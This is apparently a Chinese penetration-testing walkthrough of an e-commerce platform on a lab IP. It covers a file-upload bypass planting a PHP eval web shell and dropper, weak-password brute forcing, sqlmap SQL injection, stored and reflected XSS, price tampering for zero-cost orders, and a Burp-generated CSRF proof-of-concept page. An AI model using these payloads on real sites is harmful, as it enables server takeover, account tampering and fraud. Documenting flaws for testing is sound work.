文件上传漏洞
有很多地方都存在文件上传;有的地方是要校验,加一个GIF89a就可以绕过
先注册一个账号
data:image/s3,"s3://crabby-images/fb266/fb2662cd0804d75e2f7c29f36884a490e8623fe7" alt=""
来到个人信息修改个人头像
data:image/s3,"s3://crabby-images/113fe/113fe6f93bcc1ae1fdd75880de8de00cea79747f" alt=""
选择我们的马
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');
?>
在BP中进行抓包,改为1.php
data:image/s3,"s3://crabby-images/8cc5c/8cc5cd78baafbd13622c41c9ba3ba1f00bcc2a3b" alt=""
右键图片在网页新建打开图片标签;就能获取路径
data:image/s3,"s3://crabby-images/1c9df/1c9df26f4dfb911cce92c7dc6d6b1e8f0ad71f23" alt=""
去蚁剑连接生成的h.php就行
data:image/s3,"s3://crabby-images/41c95/41c95e1135fb60a7823ecbc377f70c27356f41bf" alt=""
弱口令
使用BP抓包
data:image/s3,"s3://crabby-images/04aaa/04aaabaefed3391897315f7c547abd2b439013ca" alt=""
在用户名和密码位添加payload
data:image/s3,"s3://crabby-images/a062b/a062be39509188d6f098f45f6a9ae459a4310525" alt=""
payload设置;选择我们的字典
data:image/s3,"s3://crabby-images/09a39/09a39f638ccec2dedd4a663a9c7d949846438c38" alt=""
开始攻击
data:image/s3,"s3://crabby-images/46510/4651020015dc06c10229337f5d90bf3ff247ca6f" alt=""
得出用户名密码
data:image/s3,"s3://crabby-images/0489e/0489eb87ea85be2055cb2f4f9268645e43b721da" alt=""
#用户名
admin
#密码
admin1
成功登录
data:image/s3,"s3://crabby-images/c1bdf/c1bdffbab71bb4b0f3ed8fe9df38b07536a6fcfd" alt=""
SQL注入漏洞
基于布尔时间盲注
第一个存在点
data:image/s3,"s3://crabby-images/e96ba/e96ba85d9cba5d4492dd1b75f22168f7792c58e2" alt=""
data:image/s3,"s3://crabby-images/5cd55/5cd55d51666a0fe2948035cb5ffc6458575b596b" alt=""
sqlmap跑出来的
data:image/s3,"s3://crabby-images/1e1b4/1e1b487967dbd2e4d1ef5fc8f9e2ab1a4f9de8d1" alt=""
第二个存在点
data:image/s3,"s3://crabby-images/290c7/290c79b9d5cd203022c13ea8e0862e1bb7ab4b1e" alt=""
二次外带注入
data:image/s3,"s3://crabby-images/b761e/b761e2320e3bfe51810ddbbe1243769b9f8bb430" alt=""
data:image/s3,"s3://crabby-images/f9fda/f9fda393ed2c23817774b2723dc3e0be0ea555b8" alt=""
XSS漏洞
存储型
1.后台-->设置-->基础设置-->商城第三方统计代码
data:image/s3,"s3://crabby-images/c9d87/c9d87f0b2a8855fc22e9b65d41747eda7e508b1b" alt=""
来到首页就会弹窗
data:image/s3,"s3://crabby-images/1fe84/1fe848974fc79d079284d90bc593eb2eb3f89fda" alt=""
2.后台-->网站--->广告位
反射型
1.后台--微信--消息管理素材管理-->添加消息存储-->标题
data:image/s3,"s3://crabby-images/83135/8313558e0d155fe81ff17afaa849634153b83902" alt=""
data:image/s3,"s3://crabby-images/dfb90/dfb90b56113d38fcc8dcfc9d25194f8092380cab" alt=""
0元购
在商品页面抓包
data:image/s3,"s3://crabby-images/c7dd2/c7dd27394ba2912ac89b175fb7dc8e4d53ba9435" alt=""
通过改变数量改变价格
data:image/s3,"s3://crabby-images/b48a5/b48a59ef7414f485d5d6cad08c8684f4832cf0bd" alt=""
在放行一次修改数量为0.00000001
data:image/s3,"s3://crabby-images/ae12a/ae12adfa1bc5979949e8d480566d7cd264e8ec36" alt=""
一共修改两次
后面全部放行就OK了
data:image/s3,"s3://crabby-images/e944c/e944c436606df55a7349b25abd9c061c0ed15833" alt=""
CSRF漏洞
下载源码;制作修改用户信息链接
修改用户信息
data:image/s3,"s3://crabby-images/7aaf4/7aaf430487b0cdde1fe0823fde85b4ac9a4661f9" alt=""
BP抓包;制作SCRF
data:image/s3,"s3://crabby-images/a4e9b/a4e9b9b8c7e2735b3474e32e2f6bfae2079b5d23" alt=""
复制下来制作链接
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://172.16.1.195/niushop/index.php?s=/member/person" method="POST" enctype="multipart/form-data">
<input type="hidden" name="user_name" value="bbbcdff" />
<input type="hidden" name="real_name" value="11wsdasa" />
<input type="hidden" name="birthday" value="1970-01-01" />
<input type="hidden" name="location" value="'onclick='alert(1)'" />
<input type="hidden" name="user_qq" value="2461" />
<input type="hidden" name="act" value="act_edit_profile" />
<input type="hidden" name="submit" value="确认修改基本信息" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
用户在已登录的状态点击我们的链接
data:image/s3,"s3://crabby-images/d4e2a/d4e2a98f91e7bba2de1f616058c1c48e1dbeb05c" alt=""
data:image/s3,"s3://crabby-images/01bee/01bee053e7e876f0e14e8e09053332212ca9b4d2" alt=""
data:image/s3,"s3://crabby-images/f7835/f78354bd818aaac9eb99f8de29bea6e37c9d3c5a" alt=""